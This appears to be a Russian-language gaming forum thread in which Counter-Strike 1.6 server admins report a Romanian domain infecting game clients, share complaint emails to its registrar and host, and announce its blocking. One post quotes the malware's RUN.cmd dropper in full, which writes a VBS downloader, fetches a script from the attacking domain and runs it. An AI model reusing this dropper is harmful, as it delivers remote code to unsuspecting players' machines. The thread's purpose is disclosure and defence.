fast-boost[.]ro

Статус
В этой теме нельзя размещать новые ответы.

ifx

Сообщения
331
Реакции
153
Помог
4 раз(а)
Всем привет, поднадоели подмены мс от румынов, сегодня очередная подмена была, попали все более-менее крупные мониторинги - https://c-s.net.ua/forum/topic87997s8820.html#entry1092865
В связи с этим предлагаю накидать жалоб на почту хостинг-регистратору, чтобы домен заблочили, а зодно и хостеру, на котором сейчас находится домен

кому лень делать все самому, копируйте текст ниже на 2 почты

[email protected]

Hello from Russia
this domain send viruses to game-servers counter-strike 1.6 and infect game clients
pls stop host it
im attach image and link on dat image, that upload to game client and infect virus

--------------------------
[email protected]

Добрый день
этот домен распространяет вирусы через игровой сервер counter-strike 1.6 и заражает клиент игры
пожалуйста прекратите хостить его
в аттаче картинка и ссылка на заражаемый файл клиентом, который скачивается автоматически, при входе в игру

Screenshot_1.pngScreenshot_2.png

-----------------
UPD
ответ от ру-хостера уже пришел, ждем


Screenshot_3.png

UPD2
с сервера выше подмену убрали, но файл все также доступен


новый файл) и ссылка - http://fast-boost.ro/cmd/RUN.cmd

Код:
@echo off

set DLOAD_SCRIPT=download.vbs
echo Option Explicit                                                    >  %DLOAD_SCRIPT%
echo Dim args, http, fileSystem, adoStream, url, target, status         >> %DLOAD_SCRIPT%
echo.                                                                   >> %DLOAD_SCRIPT%
echo Set args = Wscript.Arguments                                       >> %DLOAD_SCRIPT%
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1")              >> %DLOAD_SCRIPT%
echo url = args(0)                                                      >> %DLOAD_SCRIPT%
echo target = args(1)                                                   >> %DLOAD_SCRIPT%
echo WScript.Echo "Getting '" ^& target ^& "' from '" ^& url ^& "'..."  >> %DLOAD_SCRIPT%
echo.                                                                   >> %DLOAD_SCRIPT%
echo http.Open "GET", url, False                                        >> %DLOAD_SCRIPT%
echo http.Send                                                          >> %DLOAD_SCRIPT%
echo status = http.Status                                               >> %DLOAD_SCRIPT%
echo.                                                                   >> %DLOAD_SCRIPT%
echo If status ^<^> 200 Then                                            >> %DLOAD_SCRIPT%
echo     WScript.Echo "FAILED to download: HTTP Status " ^& status       >> %DLOAD_SCRIPT%
echo     WScript.Quit 1                                                  >> %DLOAD_SCRIPT%
echo End If                                                             >> %DLOAD_SCRIPT%
echo.                                                                   >> %DLOAD_SCRIPT%
echo Set adoStream = CreateObject("ADODB.Stream")                       >> %DLOAD_SCRIPT%
echo adoStream.Open                                                     >> %DLOAD_SCRIPT%
echo adoStream.Type = 1                                                 >> %DLOAD_SCRIPT%
echo adoStream.Write http.ResponseBody                                  >> %DLOAD_SCRIPT%
echo adoStream.Position = 0                                             >> %DLOAD_SCRIPT%
echo.                                                                   >> %DLOAD_SCRIPT%
echo Set fileSystem = CreateObject("Scripting.FileSystemObject")        >> %DLOAD_SCRIPT%
echo If fileSystem.FileExists(target) Then fileSystem.DeleteFile target >> %DLOAD_SCRIPT%
echo adoStream.SaveToFile target                                        >> %DLOAD_SCRIPT%
echo adoStream.Close                                                    >> %DLOAD_SCRIPT%
echo.                                                                   >> %DLOAD_SCRIPT%

cscript //Nologo %DLOAD_SCRIPT% http://fast-boost.ro/ms/click_run.vbs down.vbs

start down.vbs
 
Последнее редактирование:

ifx

Сообщения
331
Реакции
153
Помог
4 раз(а)
кроме Dr.Web, также эту заразу теперь будет детектить Касперский
 

Вложения

Сообщения
265
Реакции
346
1731417315
Таких белонардов штук 5 у себя выловил, возможности проверить диск C нету полностью, синий экран возникает.
А так, никогда не думал, что можно загружать вирусы через кс, просто зайдя на сервер, ужас.
 
Сообщения
1,572
Реакции
656
Помог
5 раз(а)

Garey

ninjaCow
Сообщения
437
Реакции
1,092
Помог
11 раз(а)
стим тоже заражает?
 

ifx

Сообщения
331
Реакции
153
Помог
4 раз(а)
Garey, по идее нет, в стиме мотд просто блочится, показывая пустое окно
проблема актуальна только для 4554 билдов
 
Сообщения
265
Реакции
346
Garey, по идее нет, в стиме мотд просто блочится, показывая пустое окно
проблема актуальна только для 4554 билдов
Странно, я только со стим клиента и сижу, однако, как видишь)
Помню на какой-т осервер зашел к товарищу, у меня из кс вылетело после захода на сервер, естественно все кфг битые, точно не помню, но вроде она даже не запускалась после этого(только переустановить), а если и запускалась, то лагало.
 

ifx

Сообщения
331
Реакции
153
Помог
4 раз(а)
домен fast-boost.ro заблочен, спасибо всем кто помогал!

Screenshot_3.png
 
Статус
В этой теме нельзя размещать новые ответы.

Пользователи, просматривающие эту тему

Сейчас на форуме нет ни одного пользователя.
Сверху Снизу